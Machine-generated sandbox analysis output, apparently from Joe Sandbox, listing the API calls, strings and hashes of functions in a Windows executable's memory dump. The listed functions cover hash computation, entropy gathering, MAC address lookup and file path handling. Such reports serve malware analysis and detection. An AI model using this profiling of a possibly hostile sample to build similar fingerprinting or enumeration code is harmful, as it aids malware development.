                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                • String ID:
                                                                                                • API String ID: 1282695788-0
                                                                                                • Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                                • Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
                                                                                                • Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                                • Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1111 427f3d-427f47 call 427e0e 1113 427f4c-427f50 1111->1113
                                                                                                APIs
                                                                                                • _doexit.LIBCMT ref: 00427F47
                                                                                                  • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                                                                                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                                                                                                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                                                                                                  • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                                                                                                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                                                                                                  • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                                                                                                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                                                                                                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                • String ID:
                                                                                                • API String ID: 2158581194-0
                                                                                                • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                                                                                                • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD
                                                                                                APIs
                                                                                                • GetVersionExA.KERNEL32(00000094), ref: 00481983
                                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
                                                                                                • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
                                                                                                • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
                                                                                                • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
                                                                                                • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
                                                                                                • FreeLibrary.KERNEL32(?), ref: 00481AC5
                                                                                                • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
                                                                                                • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
                                                                                                • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
                                                                                                • FreeLibrary.KERNEL32(?), ref: 00481C15
                                                                                                • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
                                                                                                • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
                                                                                                • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
                                                                                                • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
                                                                                                • FreeLibrary.KERNEL32(?), ref: 00481D45
                                                                                                • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
                                                                                                • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
                                                                                                • GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
                                                                                                • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
                                                                                                • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
                                                                                                • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
                                                                                                • GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
                                                                                                • GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
                                                                                                • GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
                                                                                                • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
                                                                                                • GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
                                                                                                • GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
                                                                                                • GetTickCount.KERNEL32 ref: 00481F03
                                                                                                • GetTickCount.KERNEL32 ref: 00481FF1
                                                                                                • GetTickCount.KERNEL32 ref: 00482066
                                                                                                • GetTickCount.KERNEL32 ref: 00482095
                                                                                                • GetTickCount.KERNEL32 ref: 004820FB
                                                                                                • GetTickCount.KERNEL32 ref: 00482118
                                                                                                • GetTickCount.KERNEL32 ref: 00482187
                                                                                                • GetTickCount.KERNEL32 ref: 004821A4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$CountTick$Library$Load$Free$Version
                                                                                                • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                • API String ID: 842291066-1723836103
                                                                                                • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                                                                                • Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
                                                                                                • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                                                                                • Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D
                                                                                                APIs
                                                                                                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                                                                                                • __CxxThrowException@8.LIBCMT ref: 00411026
                                                                                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                                                                                                • __CxxThrowException@8.LIBCMT ref: 00411051
                                                                                                • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                                                                                                • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0041107A
                                                                                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                                                                                                • __CxxThrowException@8.LIBCMT ref: 004110AB
                                                                                                • _memset.LIBCMT ref: 004110CA
                                                                                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                                                                                                • __CxxThrowException@8.LIBCMT ref: 004110F0
                                                                                                • _malloc.LIBCMT ref: 00411100
                                                                                                • _memset.LIBCMT ref: 0041110B
                                                                                                • _sprintf.LIBCMT ref: 0041112E
                                                                                                • lstrcatA.KERNEL32(?,?), ref: 0041113C
                                                                                                • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                • String ID: %.2X
                                                                                                • API String ID: 2451520719-213608013
                                                                                                • Opcode ID: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
                                                                                                • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                                                                                                • Opcode Fuzzy Hash: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
                                                                                                • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32 ref: 00411915
                                                                                                • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                                                                                                • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                                                                                                • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                                                                                                • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                                                                                                • lstrcpyW.KERNEL32(00000000,?), ref: 00411962
                                                                                                • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                                                                                                • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                                                                                                • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                                                                                                • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                                                                                                • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                                                                                                • _memset.LIBCMT ref: 004119B8
                                                                                                • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                                                                                                  • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                                                                                                • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                • String ID: failed with error
                                                                                                • API String ID: 4182478520-946485432
                                                                                                • Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                                • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                                                                                                • Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                                • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                                                                                                APIs
                                                                                                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                                                                                                  • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                                                                                                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                                                                                                • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
                                                                                                • _memmove.LIBCMT ref: 0040F9EA
                                                                                                • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                                                                                                • _memmove.LIBCMT ref: 0040FADA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                • String ID:
                                                                                                • API String ID: 273148273-0
                                                                                                • Opcode ID: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
                                                                                                • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
                                                                                                • Opcode Fuzzy Hash: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
                                                                                                • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99
                                                                                                APIs
                                                                                                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                                                                                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0040E90F
                                                                                                • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0040E93E
                                                                                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0040E96F
                                                                                                • _memset.LIBCMT ref: 0040E98E
                                                                                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                                                                                                • _sprintf.LIBCMT ref: 0040E9D3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                • String ID: %.2X
                                                                                                • API String ID: 1084002244-213608013
                                                                                                • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                                                                                                • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
                                                                                                APIs
                                                                                                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0040EB17
                                                                                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0040EB42
                                                                                                • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0040EB64
                                                                                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0040EB95
                                                                                                • _memset.LIBCMT ref: 0040EBB4
                                                                                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                                                                                                • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                                                                                                • _sprintf.LIBCMT ref: 0040EBF4
                                                                                                • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                • String ID: %.2X
                                                                                                • API String ID: 1637485200-213608013
                                                                                                • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                                                                                                • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                                                                                                APIs
                                                                                                  • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                                  • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                  • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                                                                                                  • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                  • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                  • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                  • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                  • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                                                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                                                                                                • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                                                                                                • SelectObject.GDI32(?,?), ref: 00482436
                                                                                                • DeleteObject.GDI32(00000000), ref: 0048243D
                                                                                                • DeleteDC.GDI32(?), ref: 0048244A
                                                                                                • DeleteDC.GDI32(?), ref: 00482450
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                • API String ID: 151064509-1805842116
                                                                                                • Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                                                                                                • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
                                                                                                • Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                                                                                                • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 0040E67F
                                                                                                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00550000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                • _malloc.LIBCMT ref: 0040E68B
                                                                                                • _wprintf.LIBCMT ref: 0040E69E
                                                                                                • _free.LIBCMT ref: 0040E6A4
                                                                                                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                                                                                                • _free.LIBCMT ref: 0040E6C5
                                                                                                • _malloc.LIBCMT ref: 0040E6CD
                                                                                                • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                                                                                                • _sprintf.LIBCMT ref: 0040E720
                                                                                                • _wprintf.LIBCMT ref: 0040E732
                                                                                                • _wprintf.LIBCMT ref: 0040E73C
                                                                                                • _free.LIBCMT ref: 0040E745
                                                                                                Strings
                                                                                                • Address: %s, mac: %s, xrefs: 0040E72D
                                                                                                • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                                                                                                • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                • API String ID: 3901070236-1604013687
                                                                                                • Opcode ID: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                                                                                                • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                                                                                                • Opcode Fuzzy Hash: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                                                                                                • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                                                                                                APIs
                                                                                                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                                                                                                  • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                                                                                                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                                                                                                • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
                                                                                                • _memmove.LIBCMT ref: 00410427
                                                                                                • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
                                                                                                • _memmove.LIBCMT ref: 00410514
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                • String ID:
                                                                                                • API String ID: 273148273-0
                                                                                                • Opcode ID: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
                                                                                                • Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
                                                                                                • Opcode Fuzzy Hash: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
                                                                                                • Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                • String ID:
                                                                                                • API String ID: 3232302685-0
                                                                                                • Opcode ID: 8e7fd9746f064940cb66d6ef43538eded20f2cba022702fc4082d6d5591459cc
